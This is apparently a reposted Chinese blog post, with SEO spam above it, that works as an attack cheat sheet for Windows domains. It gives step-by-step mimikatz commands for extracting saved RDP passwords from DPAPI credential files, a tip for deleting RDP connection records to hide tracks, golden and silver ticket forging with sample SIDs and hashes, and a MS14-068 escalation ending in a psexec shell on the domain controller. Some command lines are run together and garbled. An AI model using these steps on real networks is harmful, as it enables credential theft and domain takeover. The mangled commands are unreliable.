网址大全下载app鄂州网站seo
news/
2025/10/6 20:42:15/
文章来源:
网址大全下载app,鄂州网站seo,怎么建设淘客自己的网站、,wordpress 无广告目录 smbclient工具
mimikatz工具
Kerbers协议
NTLM认证
hash传递攻击#xff08;PTH攻击#xff09;
黄金票据攻击
白银票据
MS14-068 smbclient工具 在linux里面连接远程windows共享目录#xff0c;可以使用这个工具
第一种连接方式#xff1a;smbclient -L 目…目录 smbclient工具
mimikatz工具
Kerbers协议
NTLM认证
hash传递攻击PTH攻击
黄金票据攻击
白银票据
MS14-068 smbclient工具 在linux里面连接远程windows共享目录可以使用这个工具
第一种连接方式smbclient -L 目标IP -U username -W domain
smbclient -L 目标IP -U username%password -W domain
第二种连接方式smbclient //目标IP/tmp/ -U username -W domain
smbclient //目标IP/tmp -U username%password -W domain mimikatz工具 1、输入cmdkey /list 查看本地连接rdp的记录
2、dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 查看本地的 Credentials可以得到认证路径以及key值
3、使用mimikatz工具
使用 mimikatz
输入 dpapi::cred /in:认证路径\key值
4、我们这时候会得到可用信息我们记录guidMasterKey值
5、mimikatz.exe privilege::debug sekurlsa::dpapi full exit存放路径
6、这时候我们就得到了导出来的guidMasterKey值的一些加密信息记录一下加密情况下的密文以及masterkey的值
7、进入mimikatz
执行命令
dpapi::cred /in:认证路径\key值/masterkey:key值
8、这时候我们就得到了明文密码 尽量不要手动删除注册表
del Default.rdp 这个命令就可以删除rdp连接记录 Kerbers协议 Kerbers协议是一个身份验证机制常用于windows域内Kerbers协议可以有效的防止密码被嗅探和重放攻击
在所有的通信过程中都是使用加密机制的可以有效防止中间人攻击
身份验证过程
1、认证服务器AS 用户向AS发送身份验证请求。AS生成用于用户和服务之间通信的临时密钥票据授予票据 - TGT。
票据授予服务器TGS 用户使用TGT请求特定服务的票据。TGS验证用户然后生成用于与所需服务通信的票据。
票据
2、票据授予票据TGT 用户向AS请求TGT它包含用户身份信息和加密密钥。
服务票据 用户使用TGT向TGS请求服务票据该票据允许用户与特定服务进行通信。
3、单点登录SSO 用户只需通过一次身份验证即可访问多个服务而不必为每个服务都提供凭据。
4、安全通信 所有通信都使用加密密钥进行加密防止中间人攻击。
黄金白银票据
黄金票据通票伪造TGT
白银票据专票伪造TGS
整个过程都要通过DC域服务器的验证 首先认证TGT然后认证TGS
NTLM认证 NTLM使用挑战-响应机制进行身份验证通常用于局域网中的Windows系统间的身份验证 hash传递攻击PTH攻击 黄金票据攻击 总结
1、想要获取到黄金票据就需要tgt和域控的sid
whoami /all 可得到域控的sid也可以用mimikatz
mimikatz.exe privilege::debug lsadump::lsa /patch exit 1.txt
2、有了tgt和sid就可以利用mimikatz进行黄金票据的伪造了
mimikatz.exe kerberos::golden /user:xyz /domain:xyz.com /sid:S-1-5-21-116212833-2811902251-1975316662/krbtgt:789b3d4352b5a603c97cbfaf4b9a1046/ptt exit
3、利用psexec调用目标域控的cmd
psexec.exe \\域名.域 cmd.exe 白银票据 总结
1、想要获取白银票据需要满足三个条件域控的IP、域控的sid、域控的hash。
域控的IP ping 123.com域
域控的sidmimikatz或者whoami /all
域控的hash: mimikatz
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit 2.txt
2、伪造白银票据
mimikatz.exe kerberos::golden /user:xyz /domain:xyz.com /sid:s-1-5-21-2511895695-3322341454-56546430
/target:WIN-9JK4CNGD41.xy.com /service:cifs /rc4:02c93f06b80c1feb55df4bcf6551c66e /ptt exit
3、清除票据
klist purge MS14-068 总结
这个漏洞MS14-068不需要域控的管理员hash只需要域内普通用户权限即可
1、获取当前用户的sid whoami /all
2、使用MS14-068提权工具生成伪造的kerberos协议证书
MS14-068.exe -u userNamedomainName -p clearPasswords userSid-d domainControlerAddrms14-068.exe -u xyzcc.com -p 123.com-s S-1-5-21-2511895695-3322341454-56546430-1104-d WIN-9JJK4CNGD41.cc.com
3、使用mimikatz将伪造证书写入
mimikatz.exekerberos::ptc TGT_xycc.com.ccache exit
4、使用psexec提权即可
psexec.exe \\WIN-9JJK4CNGD41.cc.com cmd.exe
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/929679.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!